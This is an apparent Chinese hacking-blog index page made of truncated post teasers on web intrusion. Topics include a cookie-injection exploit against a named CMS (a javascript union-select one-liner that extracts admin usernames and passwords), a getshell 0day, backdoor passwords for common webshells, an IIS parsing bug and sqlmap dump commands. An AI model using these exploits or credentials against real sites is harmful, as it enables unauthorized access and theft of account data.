存在注入么??

   今天在打CTF的时候发现了一段PHP代码。这里摆出来大家看看。         $password=$_POST['password']; $sql = "SELECT * FROM admin WHERE username = 'admin' and password = '".md5($password,true)." [阅读全文]

szwyadmin程序的cookie欺骗漏洞

老猫 | 信息安全 | 2018-02-17
大家好我是戒灵-----也就是China、猫叔 今天给大家带来的是关于cookie的玩意 首先我们关键词去找后台,找到后台操作第二步:把整个url换为javaasript的代码 由于这个代码包含了万能密码,表,列等等 《代码的含义呢:大概也就是让网站认为我们是一个管理员,可以让我们自由进出!》 [阅读全文]

你下载的webshell“后门”密码公布

因为很多原因,很多新手都不会编写自己的大马,大多数新手都会通过百度去下载对应脚本的大马,然而这些webshell大马都是早期流传出来的,基本上都存在后门,可以通过万能密码登录,即便你修改i过密码了,怎么样是不是很可怕?下面就将这些万能密码分享给大家吧! 黑羽基地免杀asp大马 密码5201314 Hacked By CHINA! 密码china Asp站长 [阅读全文]

科讯cms6.x~8.x getshell(0day)

详细说明 类似phpcms的任意文件上传 Wap/Plus/PhotoVote.asp 14 – 23 ASP Dim KS:Set KS=New PublicCls  Dim ID:ID = Replace(KS.S(“ID”),” “,“”) Dim ChannelID:ChannelID=KS.G(“Chan [阅读全文]

IIS 7.5 解析错误命令执行漏洞

一、漏洞介绍 漏洞影响 IIS7 及IIS7.5 在使FastCGI方式调用php时,在php.ini里设置 cgi.fix_pathinfo=1 使得访问任意文件URL时,在URL后面添加“/x.php”等字符时,该文件被iis当php文件代码解析。 如 http://127.0.0.1/1.gif 的内容如下: 当访问 http:/ [阅读全文]

WEB 0day漏洞合集(新手必备的渗透手册)

启航企业建站系统 cookie注入漏洞通杀所有版本 直接上exploit: javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));test:http://www.hack-ma2.cn/ [阅读全文]

图片渗透

老猫 | 信息安全 | 2018-01-26
大家好我还是那个老猫子China、猫叔   QQ:2189190137 今天要讲的是word文档利用图片来进行注入渗透。   word文档的渗透: 第一步,我们需要打开菜单栏上的“插入”选项卡并单击“图片”图标。这个时候会弹出资源管理器窗口。在文件名字段中输入一共恶意URL,并点击“插入” [阅读全文]
ė675次浏览 60条评论 0 渗透

sqlmap简单使用手册

MA2安全团队 | Linux | 2018-01-10
注入点:url 获取注入信息 sqlmap -u url 获取全部表段 sqlmap -u url --tables 获取全部字段 sqlmap -u url --columns -T 字段 获取字段内容 sqlmap -u url --dump -C "内容,内容" -T 字段 [阅读全文]

Ɣ回顶部